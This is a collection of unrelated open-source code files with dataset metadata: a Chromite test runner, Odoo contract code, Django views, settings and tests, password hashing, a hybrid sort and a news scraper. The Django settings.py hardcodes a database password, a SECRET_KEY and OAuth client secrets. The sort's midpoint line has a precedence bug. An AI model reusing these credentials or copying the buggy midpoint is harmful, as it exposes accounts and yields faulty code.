help='List all the available tests')
parser.add_argument('tests', nargs='*', metavar='test',
help='Specific tests to run (default runs all)')
opts = parser.parse_args(args)
opts.Freeze()
return opts
def FindImage(image_path):
"""Return the path to the image file.
Args:
image_path: A path to the image file, or a directory containing the base
image.
Returns:
ImageFileAndMountScripts containing absolute paths to the image,
the mount and umount invocation commands
"""
if os.path.isdir(image_path):
# Assume base image.
image_file = os.path.join(image_path, constants.BASE_IMAGE_NAME + '.bin')
if not os.path.exists(image_file):
raise ValueError('Cannot find base image %s' % image_file)
elif os.path.isfile(image_path):
image_file = image_path
else:
raise ValueError('%s is neither a directory nor a file' % image_path)
return image_file
def main(args):
opts = ParseArgs(args)
# Build up test suites.
loader = unittest.TestLoader()
loader.suiteClass = image_test_lib.ImageTestSuite
# We use a different prefix here so that unittest DO NOT pick up the
# image tests automatically because they depend on a proper environment.
loader.testMethodPrefix = 'Test'
tests_namespace = 'chromite.cros.test.image_test'
if opts.tests:
tests = ['%s.%s' % (tests_namespace, x) for x in opts.tests]
else:
tests = (tests_namespace,)
all_tests = loader.loadTestsFromNames(tests)
# If they just want to see the lists of tests, show them now.
if opts.list:
def _WalkSuite(suite):
for test in suite:
if isinstance(test, unittest.BaseTestSuite):
for result in _WalkSuite(test):
yield result
else:
yield (test.id()[len(tests_namespace) + 1:],
test.shortDescription() or '')
test_list = list(_WalkSuite(all_tests))
maxlen = max(len(x[0]) for x in test_list)
for name, desc in test_list:
print('%-*s %s' % (maxlen, name, desc))
return
# Run them in the image directory.
runner = image_test_lib.ImageTestRunner()
runner.SetBoard(opts.board)
runner.SetResultDir(opts.test_results_root)
image_file = FindImage(opts.image)
tmp_in_chroot = path_util.FromChrootPath('/tmp')
with osutils.TempDir(base_dir=tmp_in_chroot) as temp_dir:
with image_lib.LoopbackPartitions(image_file, temp_dir) as image:
# Due to the lack of mount context, we mount the partitions
# but do not reference directly. This will be removed with the
# submission of http://crrev/c/1795578
_ = image.Mount((constants.PART_ROOT_A,))[0]
_ = image.Mount((constants.PART_STATE,))[0]
with osutils.ChdirContext(temp_dir):
result = runner.run(all_tests)
if result and not result.wasSuccessful():
return 1
return 0
|
bsd-3-clause
| -3,099,706,782,971,267,600
| 32.295082
| 79
| 0.670852
| false
| 3.754159
| true
| false
| false
|
OCA/contract
|
contract_variable_quantity/models/contract_line.py
|
1
|
2127
|
# Copyright 2016 Tecnativa - Pedro M. Baeza
# Copyright 2018 Tecnativa - Carlos Dauden
# Copyright 2018 ACSONE SA/NV
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from odoo import api, models
from odoo.tools import float_is_zero
from odoo.tools.safe_eval import safe_eval
class AccountAnalyticInvoiceLine(models.Model):
_inherit = 'contract.line'
@api.multi
def _get_quantity_to_invoice(
self, period_first_date, period_last_date, invoice_date
):
quantity = super(
AccountAnalyticInvoiceLine, self
)._get_quantity_to_invoice(
period_first_date, period_last_date, invoice_date
)
if not period_first_date or not period_last_date or not invoice_date:
return quantity
if self.qty_type == 'variable':
eval_context = {
'env': self.env,
'context': self.env.context,
'user': self.env.user,
'line': self,
'quantity': quantity,
'period_first_date': period_first_date,
'period_last_date': period_last_date,
'invoice_date': invoice_date,
'contract': self.contract_id,
}
safe_eval(
self.qty_formula_id.code.strip(),
eval_context,
mode="exec",
nocopy=True,
) # nocopy for returning result
quantity = eval_context.get('result', 0)
return quantity
@api.multi
def _prepare_invoice_line(self, invoice_id=False, invoice_values=False):
vals = super(AccountAnalyticInvoiceLine, self)._prepare_invoice_line(
invoice_id=invoice_id, invoice_values=invoice_values,
)
if (
'quantity' in vals
and self.contract_id.skip_zero_qty
and float_is_zero(
vals['quantity'],
self.env['decimal.precision'].precision_get(
'Product Unit of Measure'
),
)
):
vals = {}
return vals
|
agpl-3.0
| 1,996,008,599,080,476,700
| 33.306452
| 77
| 0.5496
| false
| 4.05916
| false
| false
| false
|
fusionbox/satchless
|
examples/demo/core/views.py
|
1
|
1250
|
# -*- coding:utf-8 -*-
from django.contrib import messages
from django.shortcuts import redirect
from django.template.response import TemplateResponse
from django.utils.translation import ugettext_lazy as _
from satchless.order.app import order_app
def home_page(request):
messages.success(request, _(u'<strong>Welcome!</strong> This is a demo shop built on Satchless. Enjoy!'))
return TemplateResponse(request, 'core/home_page.html')
def thank_you_page(request, order_token):
order = order_app.get_order(request, order_token)
if not order.status in ('payment-failed', 'payment-complete', 'delivery'):
return redirect(order_app.reverse('satchless-order-view',
args=(order.token,)))
if order.status == 'payment-failed':
return redirect('payment-failed', order_token=order.token)
return TemplateResponse(request, 'satchless/checkout/thank_you.html', {
'order': order,
})
def payment_failed(request, order_token):
order = order_app.get_order(request, order_token)
if order.status != 'payment-failed':
return redirect(order)
return TemplateResponse(request, 'satchless/checkout/payment_failed.html', {
'order': order,
})
|
bsd-3-clause
| -7,441,253,123,787,888,000
| 36.878788
| 109
| 0.6872
| false
| 3.869969
| false
| false
| false
|
Robbie1977/AlignmentPipe
|
align/settings.py
|
1
|
10620
|
import psycopg2, os
# import subprocess
from socket import gethostname
host = gethostname()
con = psycopg2.connect(host='bocian.inf.ed.ac.uk', database='alignment', user='aligner_admin', password='default99')
cur = con.cursor()
cur.execute("SELECT upload_dir FROM system_server WHERE host_name like '" + host + "'")
record = cur.fetchone()
if record == None:
print 'Missing server settings for ' + str(host)
cur.execute("SELECT upload_dir, host_name FROM system_server")
record = cur.fetchone()
print 'Having to use settings for ' + str(record[1])
host = str(record[1])
uploadfolder = str(record[0])
cur.close()
con.close()
del cur, con, record
# Use to reset file permission only if error occurs
# for file in os.listdir(uploadfolder):
# try:
# # os.chmod(uploadfolder + file, stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)
# subprocess.call(['chmod', '0777', uploadfolder + file])
# print 'OK: ' + file
# except:
# print 'Error: ' + file
#
# Django settings for align project.
# DEBUG = True
# TEMPLATE_DEBUG = DEBUG
ADMINS = (
('Robert Court', 'r.court@ed.ac.uk'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'django_mongodb_engine'.
'NAME': 'alignment', # Or path to database file if using sqlite3.
# The following settings are not used with sqlite3:
'USER': 'aligner_admin',
'PASSWORD': 'default99',
'HOST': 'bocian.inf.ed.ac.uk', # Empty for localhost through domain sockets or '127.0.0.1' for localhost through TCP.
'PORT': '', # Set to empty string for default.
}
}
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
ALLOWED_HOSTS = ['localhost', '127.0.0.1', 'bocian.inf.ed.ac.uk', 'vfbaligner.inf.ed.ac.uk']
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'Europe/London'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-gb'
# SITE_ID=u'5395bb746c132991c57933f6'
SITE_ID=1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/var/www/example.com/media/"
MEDIA_ROOT = '/disk/data/VFB/aligner/uploads/'
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://example.com/media/", "http://media.example.com/"
MEDIA_URL = '/media/'
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/var/www/example.com/static/"
STATIC_ROOT = '/disk/data/VFB/aligner/static/'
# URL prefix for static files.
# Example: "http://example.com/static/", "http://static.example.com/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'dv16bwh3f1x%p9csb3o7l9k#o8d_oqp-)aa=afq%yj+2$s96_('
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
LOGIN_URL = '/'
LOGIN_REDIRECT_URL = '/'
LOGIN_ERROR_URL = '/'
SOCIAL_AUTH_COMPLETE_URL_NAME = 'socialauth_complete'
SOCIAL_AUTH_ASSOCIATE_URL_NAME = 'socialauth_associate_complete'
SOCIAL_AUTH_GITHUB_KEY = 'e8bfae9142f86f36b391'
SOCIAL_AUTH_GITHUB_SECRET = 'b7617cf006cace2e60d90f089816924e0eabbd0f'
SOCIAL_AUTH_GITHUB_SCOPE = ['user:email']
# SOCIAL_AUTH_GOOGLE_OAUTH2_KEY = '884257168498-3gec80pdfpullsaeavbg2nqra3aflru5.apps.googleusercontent.com'
# SOCIAL_AUTH_GOOGLE_OAUTH2_SECRET = 'pvsqhFUx1kmBiGlVWERy_Q-b'
SOCIAL_AUTH_GOOGLE_OAUTH2_KEY = os.environ.get(
'SOCIAL_AUTH_GOOGLE_OAUTH2_KEY',
'884257168498-3gec80pdfpullsaeavbg2nqra3aflru5.apps.googleusercontent.com'
)
SOCIAL_AUTH_GOOGLE_OAUTH2_SECRET = os.environ.get(
'SOCIAL_AUTH_GOOGLE_OAUTH2_SECRET',
'pvsqhFUx1kmBiGlVWERy_Q-b'
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.static',
'django.core.context_processors.tz',
'django.contrib.messages.context_processors.messages',
'social.apps.django_app.context_processors.backends',
'social.apps.django_app.context_processors.login_redirect',
)
# MIDDLEWARE_CLASSES = (
# 'django.middleware.common.CommonMiddleware',
# 'django.contrib.sessions.middleware.SessionMiddleware',
# 'django.middleware.csrf.CsrfViewMiddleware',
# 'social.apps.django_app.middleware.SocialAuthExceptionMiddleware',
# 'django.contrib.auth.middleware.AuthenticationMiddleware',
# # 'permission_backend_nonrel.backends.NonrelPermissionBackend'
# 'django.contrib.messages.middleware.MessageMiddleware',
# # Uncomment the next line for simple clickjacking protection:
# # 'django.middleware.clickjacking.XFrameOptionsMiddleware',
# )
MIDDLEWARE_CLASSES = (
'django.middleware.gzip.GZipMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'social.apps.django_app.middleware.SocialAuthExceptionMiddleware',
)
ROOT_URLCONF = 'urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'align.wsgi.application'
TEMPLATE_DIRS = (
"/disk/data/VFB/aligner/AlignmentPipe/align/images/templates/admin_copies" ,
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# AUTHENTICATION_BACKENDS = (
# 'permission_backend_nonrel.backends.NonrelPermissionBackend',
# )
# AUTHENTICATION_BACKENDS = (
# 'social.backends.google.GoogleOAuth2',
# 'social.backends.google.GooglePlusAuth',
# 'django.contrib.auth.backends.ModelBackend',
# )
# AUTHENTICATION_BACKENDS = (
# 'social.backends.open_id.OpenIdAuth',
# 'social.backends.google.GoogleOpenId',
# 'social.backends.google.GoogleOAuth2',
# 'social.backends.google.GoogleOAuth',
# 'social.backends.twitter.TwitterOAuth',
# 'social.backends.yahoo.YahooOpenId',
# 'django.contrib.auth.backends.ModelBackend',
# )
AUTHENTICATION_BACKENDS = (
# 'social.backends.facebook.FacebookOAuth2',
'social.backends.google.GoogleOAuth2',
'social.backends.google.GooglePlusAuth',
# 'social.backends.twitter.TwitterOAuth',
'django.contrib.auth.backends.ModelBackend',
'social.backends.github.GithubOAuth2',
# 'social_auth.backends.contrib.linkedin.LinkedinBackend',
)
# SOCIAL_AUTH_USER_MODEL = 'users.User'
SOCIAL_AUTH_ADMIN_USER_SEARCH_FIELDS = ['username', 'first_name', 'email']
LOGIN_REDIRECT_URL = '/'
SOCIAL_AUTH_AUTHENTICATION_BACKENDS = (
'social.backends.open_id.OpenIdAuth',
'social.backends.google.GoogleOpenId',
'social.backends.google.GoogleOAuth2',
'social.backends.google.GoogleOAuth',
'social.backends.google.GooglePlusAuth',
# 'social.backends.twitter.TwitterOAuth',
# 'social.backends.yahoo.YahooOpenId',
'social.backends.github.GithubOAuth2',
# 'social_auth.backends.contrib.linkedin.LinkedinBackend',
)
INSTALLED_APPS = (
'adminactions',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# 'django_mongodb_engine',
'django.db.backends.postgresql_psycopg2',
# 'djangotoolbox',
# 'permission_backend_nonrel',
'system',
'images',
'users',
'bootstrap3',
'images.templatetags.images_extras',
'users.templatetags.backend_utils',
# Uncomment the next line to enable the admin:
'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
'django.contrib.admindocs',
'social.apps.django_app.default',
)
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer'
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
|
mit
| -6,374,926,531,072,543,000
| 34.165563
| 146
| 0.706874
| false
| 3.366086
| false
| false
| false
|
apel/rest
|
api/tests/test_cloud_record_summary_get.py
|
1
|
9827
|
"""This module tests GET requests to the Cloud Sumamry Record endpoint."""
import logging
import MySQLdb
from api.utils.TokenChecker import TokenChecker
from django.core.urlresolvers import reverse
from django.test import Client, TestCase
from mock import patch
QPATH_TEST = '/tmp/django-test/'
class CloudRecordSummaryGetTest(TestCase):
"""Tests GET requests to the Cloud Sumamry Record endpoint."""
def setUp(self):
"""Prevent logging from appearing in test output."""
logging.disable(logging.CRITICAL)
@patch.object(TokenChecker, 'valid_token_to_id')
def test_cloud_record_summary_get_IAM_fail(self, mock_valid_token_to_id):
"""
Test what happens if we fail to contact the IAM.
i.e, _token_to_id returns None
IAM = Identity and Access Management
"""
# Mock the functionality of the IAM
# Used in the underlying GET method
# Simulates a failure to translate a token to an ID
mock_valid_token_to_id.return_value = None
with self.settings(ALLOWED_FOR_GET='TestService'):
# Make (and check) the GET request
self._check_summary_get(401,
options=("?group=TestGroup"
"&from=20000101&to=20191231"),
authZ_header_cont="Bearer TestToken")
@patch.object(TokenChecker, 'valid_token_to_id')
def test_cloud_record_summary_get_400(self, mock_valid_token_to_id):
"""Test a GET request without the from field."""
# Mock the functionality of the IAM
# Simulates the translation of a token to an ID
# Used in the underlying GET method
mock_valid_token_to_id.return_value = 'TestService'
with self.settings(ALLOWED_FOR_GET='TestService'):
# Make (and check) the GET request
self._check_summary_get(400, options="?group=TestGroup",
authZ_header_cont="Bearer TestToken")
@patch.object(TokenChecker, 'valid_token_to_id')
def test_cloud_record_summary_get_403(self, mock_valid_token_to_id):
"""Test an unauthorized service cannot make a GET request."""
# Mock the functionality of the IAM
# Simulates the translation of a token to an unauthorized ID
# Used in the underlying GET method
mock_valid_token_to_id.return_value = 'FakeService'
with self.settings(ALLOWED_FOR_GET='TestService'):
# Make (and check) the GET request
self._check_summary_get(403,
options=("?group=TestGroup"
"&from=20000101&to=20191231"),
authZ_header_cont="Bearer TestToken")
def test_cloud_record_summary_get_401(self):
"""Test an unauthenticated GET request."""
# Test without the HTTP_AUTHORIZATION header
# Make (and check) the GET request
self._check_summary_get(401,
options=("?group=TestGroup"
"&from=20000101&to=20191231"))
# Test with a malformed HTTP_AUTHORIZATION header
# Make (and check) the GET request
self._check_summary_get(401,
options=("?group=TestGroup"
"&from=20000101&to=20191231"),
authZ_header_cont="TestToken")
@patch.object(TokenChecker, 'valid_token_to_id')
def test_cloud_record_summary_get_200(self, mock_valid_token_to_id):
"""Test a successful GET request."""
# Connect to database
database = self._connect_to_database()
# Clean up any lingering example data.
self._clear_database(database)
# Add example data
self._populate_database(database)
# Mock the functionality of the IAM
mock_valid_token_to_id.return_value = 'TestService'
expected_response = ('{'
'"count":2,'
'"next":null,'
'"previous":null,'
'"results":[{'
'"WallDuration":86399,'
'"Year":2016,'
'"Day":30,'
'"Month":7'
'},{'
'"WallDuration":43200,'
'"Year":2016,'
'"Day":31,'
'"Month":7}]}')
with self.settings(ALLOWED_FOR_GET='TestService',
RETURN_HEADERS=["WallDuration",
"Day",
"Month",
"Year"]):
try:
self._check_summary_get(200,
expected_response=expected_response,
options=("?group=TestGroup"
"&from=20000101&to=20191231"),
authZ_header_cont="Bearer TestToken")
finally:
# Clean up after test.
self._clear_database(database)
database.close()
def tearDown(self):
"""Delete any messages under QPATH and re-enable logging.INFO."""
logging.disable(logging.NOTSET)
def _check_summary_get(self, expected_status, expected_response=None,
options='', authZ_header_cont=None):
"""Helper method to make a GET request."""
test_client = Client()
# Form the URL to make the GET request to
url = ''.join((reverse('CloudRecordSummaryView'), options))
if authZ_header_cont is not None:
# If content for a HTTP_AUTHORIZATION has been provided,
# make the GET request with the appropriate header
response = test_client.get(url,
HTTP_AUTHORIZATION=authZ_header_cont)
else:
# Otherise, make a GET request without a HTTP_AUTHORIZATION header
response = test_client.get(url)
# Check the expected response code has been received.
self.assertEqual(response.status_code, expected_status)
if expected_response is not None:
# Check the response received is as expected.
self.assertEqual(response.content, expected_response)
def _populate_database(self, database):
"""Populate the database with example summaries."""
cursor = database.cursor()
# Insert example usage data
cursor.execute('INSERT INTO CloudRecords '
'(VMUUID, SiteID, GlobalUserNameID, VOID, '
'VOGroupID, VORoleID, Status, StartTime, '
'SuspendDuration, WallDuration, PublisherDNID, '
'CloudType, ImageId, '
'CloudComputeServiceID) '
'VALUES '
'("TEST-VM", 1, 1, 1, 1, 1, "Running", '
'"2016-07-30 00:00:00", 0, 86399, 1, "TEST", "1", '
'1);')
# Insert example usage data
cursor.execute('INSERT INTO CloudRecords '
'(VMUUID, SiteID, GlobalUserNameID, VOID, '
'VOGroupID, VORoleID, Status, StartTime, '
'SuspendDuration, WallDuration, PublisherDNID, '
'CloudType, ImageId, '
'CloudComputeServiceID) '
'VALUES '
'("TEST-VM", 1, 1, 1, 1, 1, "Running", '
'"2016-07-30 00:00:00", 0, 129599, 1, "TEST", "1", '
'1);')
# These INSERT statements are needed
# because we query VCloudSummaries
cursor.execute('INSERT INTO Sites VALUES (1, "TestSite");')
cursor.execute('INSERT INTO VOs VALUES (1, "TestVO");')
cursor.execute('INSERT INTO VOGroups VALUES (1, "TestGroup");')
cursor.execute('INSERT INTO VORoles VALUES (1, "TestRole");')
cursor.execute('INSERT INTO DNs VALUES (1, "TestDN");')
cursor.execute('INSERT INTO CloudComputeServices '
'VALUES (1, "TestService");')
# Summarise example usage data
cursor.execute('CALL SummariseVMs();')
database.commit()
def _clear_database(self, database):
"""Clear the database of example data."""
cursor = database.cursor()
cursor.execute('DELETE FROM CloudRecords '
'WHERE VMUUID="TEST-VM";')
cursor.execute('DELETE FROM CloudSummaries '
'WHERE CloudType="TEST";')
cursor.execute('DELETE FROM Sites '
'WHERE id=1;')
cursor.execute('DELETE FROM VOs '
'WHERE id=1;')
cursor.execute('DELETE FROM VOGroups '
'WHERE id=1;')
cursor.execute('DELETE FROM VORoles '
'WHERE id=1;')
cursor.execute('DELETE FROM DNs '
'WHERE id=1;')
cursor.execute('DELETE FROM CloudComputeServices '
'WHERE id=1;')
database.commit()
def _connect_to_database(self,
host='localhost',
user='root',
password='',
name='apel_rest'):
"""Connect to and return a cursor to the given database."""
database = MySQLdb.connect(host, user, password, name)
return database
|
apache-2.0
| -8,940,463,494,486,466,000
| 40.817021
| 79
| 0.51908
| false
| 4.681753
| true
| false
| false
|
berkmancenter/mediacloud
|
apps/webapp-api/src/python/webapp/auth/password.py
|
1
|
5455
|
import base64
import hashlib
import os
from mediawords.db import DatabaseHandler
from mediawords.util.log import create_logger
from mediawords.util.perl import decode_object_from_bytes_if_needed
__HASH_SALT_PREFIX = "{SSHA256}"
__HASH_LENGTH = 64 # SHA-256 hash length
__SALT_LENGTH = 64
__MIN_PASSWORD_LENGTH = 8
__MAX_PASSWORD_LENGTH = 120
log = create_logger(__name__)
class McAuthPasswordException(Exception):
"""Password-related exceptions."""
pass
def password_hash_is_valid(password_hash: str, password: str) -> bool:
"""Validate a password / password token.
Ported from Crypt::SaltedHash: https://metacpan.org/pod/Crypt::SaltedHash
"""
password_hash = decode_object_from_bytes_if_needed(password_hash)
password = decode_object_from_bytes_if_needed(password)
if not password_hash:
raise McAuthPasswordException("Password hash is None or empty.")
if password is None:
raise McAuthPasswordException("Password is None.")
# Password can be an empty string but that would be weird so we only spit out a warning
if not password:
log.warning("Password is empty.")
if not password_hash.startswith(__HASH_SALT_PREFIX):
raise McAuthPasswordException("Password hash does not start with an expected prefix.")
if len(password_hash) != len(__HASH_SALT_PREFIX) + __HASH_LENGTH + __SALT_LENGTH:
raise McAuthPasswordException("Password hash is of the incorrect length.")
try:
password = password.encode('utf-8', errors='replace') # to concatenate with 'bytes' salt later
password_hash = password_hash[len(__HASH_SALT_PREFIX):]
salted_hash_salt = base64.b64decode(password_hash)
salt = salted_hash_salt[-1 * __SALT_LENGTH:]
expected_salted_hash = salted_hash_salt[:len(salted_hash_salt) - __SALT_LENGTH]
actual_password_salt = password + salt
sha256 = hashlib.sha256()
sha256.update(actual_password_salt)
actual_salted_hash = sha256.digest()
if expected_salted_hash == actual_salted_hash:
return True
else:
return False
except Exception as ex:
log.warning("Failed to validate hash: %s" % str(ex))
return False
def generate_secure_hash(password: str) -> str:
"""Hash a secure hash (password / password reset token) with a random salt.
Ported from Crypt::SaltedHash: https://metacpan.org/pod/Crypt::SaltedHash
"""
password = decode_object_from_bytes_if_needed(password)
if password is None:
raise McAuthPasswordException("Password is None.")
# Password can be an empty string but that would be weird so we only spit out a warning
if not password:
log.warning("Password is empty.")
password = password.encode('utf-8', errors='replace') # to concatenate with 'bytes' salt later
# os.urandom() is supposed to be crypto-secure
salt = os.urandom(__SALT_LENGTH)
password_salt = password + salt
sha256 = hashlib.sha256()
sha256.update(password_salt)
salted_hash = sha256.digest()
salted_hash_salt = salted_hash + salt
base64_salted_hash = base64.b64encode(salted_hash_salt).decode('ascii')
return __HASH_SALT_PREFIX + base64_salted_hash
def password_reset_token_is_valid(db: DatabaseHandler, email: str, password_reset_token: str) -> bool:
"""Validate password reset token (used for both user activation and password reset)."""
email = decode_object_from_bytes_if_needed(email)
password_reset_token = decode_object_from_bytes_if_needed(password_reset_token)
if not (email and password_reset_token):
log.error("Email and / or password reset token is empty.")
return False
# Fetch readonly information about the user
password_reset_token_hash = db.query("""
SELECT auth_users_id,
email,
password_reset_token_hash
FROM auth_users
WHERE email = %(email)s
LIMIT 1
""", {'email': email}).hash()
if password_reset_token_hash is None or 'auth_users_id' not in password_reset_token_hash:
log.error("Unable to find user %s in the database." % email)
return False
password_reset_token_hash = password_reset_token_hash['password_reset_token_hash']
if password_hash_is_valid(password_hash=password_reset_token_hash, password=password_reset_token):
return True
else:
return False
def validate_new_password(email: str, password: str, password_repeat: str) -> str:
"""Check if password complies with strength the requirements.
Returns empty string on valid password, error message on invalid password."""
email = decode_object_from_bytes_if_needed(email)
password = decode_object_from_bytes_if_needed(password)
password_repeat = decode_object_from_bytes_if_needed(password_repeat)
if not email:
return 'Email address is empty.'
if not (password and password_repeat):
return 'To set the password, please repeat the new password twice.'
if password != password_repeat:
return 'Passwords do not match.'
if len(password) < __MIN_PASSWORD_LENGTH or len(password) > __MAX_PASSWORD_LENGTH:
return 'Password must be between %d and %d characters length.' % (__MIN_PASSWORD_LENGTH, __MAX_PASSWORD_LENGTH,)
if password == email:
return "New password is your email address; don't cheat!"
return ''
|
agpl-3.0
| 8,678,888,388,578,591,000
| 32.67284
| 120
| 0.67846
| false
| 3.841549
| false
| false
| false
|
jakubtyniecki/pact
|
sort/hybrid.py
|
1
|
2447
|
""" hybrid sort module """
from sort.framework import validate
THRESHOLD = 10 # threshold when to fallback to insert sort
@validate
def sort(arr):
""" hybrid sort """
hybridsort(arr, 0, len(arr) - 1)
return arr
def hybridsort(arr, first, last):
""" hybrid sort """
stack = []
stack.append((first, last))
while stack:
pos = stack.pop()
left, right = pos[0], pos[1]
if right - left < THRESHOLD:
""" if array is smaller then given threshold
use insert sort as it'll be more efficient """
insertsort(arr, left, right)
else:
piv = partition(arr, left, right)
if piv - 1 > left:
stack.append((left, piv - 1))
if piv + 1 < right:
stack.append((piv + 1, right))
def insertsort(arr, first, last):
""" insert sort """
assert first <= len(arr) and last < len(arr), \
"first: {}, last: {}".format(first, last)
for i in range(first, last + 1):
position, currentvalue = i, arr[i]
while position > 0 and arr[position - 1] > currentvalue:
arr[position] = arr[position - 1]
position -= 1
arr[position] = currentvalue
def partition(arr, first, last):
""" partition """
assert first < len(arr) and last < len(arr) and first < last, \
"first: {}, last: {}".format(first, last)
pivotindex = pivotpoint(arr, first, last)
if pivotindex > first:
arr[first], arr[pivotindex] = arr[pivotindex], arr[first]
pivotvalue = arr[first]
left, right = first + 1, last
while right >= left:
while left <= right and arr[left] <= pivotvalue:
left += 1
while arr[right] >= pivotvalue and right >= left:
right -= 1
assert right >= 0 and left <= len(arr)
if right > left:
arr[left], arr[right] = arr[right], arr[left]
if right > first:
arr[first], arr[right] = arr[right], arr[first]
return right
def pivotpoint(arr, first, last):
""" pivot point strategy
using median of first, mid and last elements
to prevent worst case scenario """
mid = first + (last - first) >> 1
if (arr[first] - arr[mid]) * (arr[last] - arr[first]) >= 0:
return first
elif (arr[mid] - arr[first]) * (arr[last] - arr[mid]) >= 0:
return mid
else:
return last
|
mit
| 7,002,549,922,402,661,000
| 23.969388
| 67
| 0.548018
| false
| 3.74732
| false
| false
| false
|
xuludev/CVLH_tutorial
|
netease_spider.py
|
1
|
3334
|
import json
import time
import os
import re
import requests
from bs4 import BeautifulSoup
import chardet
"""
url_list = [
'http://tech.163.com/special/00097UHL/tech_datalist_02.js?callback=data_callback',
'http://ent.163.com/special/000380VU/newsdata_index_02.js?callback=data_callback',
'http://sports.163.com/special/000587PR/newsdata_n_index_02.js?callback=data_callback',
'http://money.163.com/special/002557S5/newsdata_idx_index.js?callback=data_callback',
'http://edu.163.com/special/002987KB/newsdata_edu_hot_02.js?callback=data_callback'
]
"""
def crawl(pn):
headers = {
'Accept': '*/*',
'Connection': 'keep-alive',
'Host': 'ent.163.com',
'Referer': 'http://ent.163.com/',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'
}
request_url = 'http://ent.163.com/special/000380VU/newsdata_index_0' + str(pn) + '.js?callback=data_callback'
# print('is crawling page ' + request_url + '......')
response = requests.get(request_url, headers=headers)
if response.status_code == 200:
page_encoding = chardet.detect(response.content)['encoding']
temp_str = response.text.replace('data_callback(', '')
# temp_str = response.content.decode(page_encoding).replace('data_callback(', '')
temp_str = temp_str.replace(temp_str[-1], '')
for each_news in json.loads(temp_str):
print(each_news['docurl'])
download_news_content(each_news['title'], each_news['docurl'])
elif response.status_code == 404:
raise Exception('No Page Found! ' + request_url)
else:
print('ERROR! ' + str(response.status_code))
def download_news_content(title, news_url):
if news_url.startswith('http://v'):
print('This page contains video ...')
else:
# r_content = re.compile('<img \w')
r_title = re.compile('[\?\"\?\:\s\/\·]')
file_dir = 'd:/网易新闻/娱乐'
if not os.path.exists(file_dir) or not os.path.isdir(file_dir):
os.makedirs(file_dir)
headers = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'
}
response = requests.get(news_url, headers=headers)
if response.status_code == 200:
soup = BeautifulSoup(response.text, 'html5lib')
if response.url.startswith('http://digi.163.com') or response.url.startswith('http://tech.163.com') or response.url.startswith('http://ent.163.com'):
text_soup = soup.select('#endText')[0]
content_text = text_soup.get_text()
elif response.url.startswith('http://dy.163.com'):
text_soup = soup.select('#content')[0]
content_text = text_soup.get_text()
elif response.url.startswith('http://mobile.163.com'):
text_soup = soup.select('#epContentLeft')[0]
content_text = text_soup.get_text()
with open(file_dir + os.path.sep + re.sub(r_title, '', title, count=0) + '.txt', mode='wt', encoding='utf-8') as f:
f.write(content_text)
f.flush()
f.close()
print(title + '.txt has been written done!')
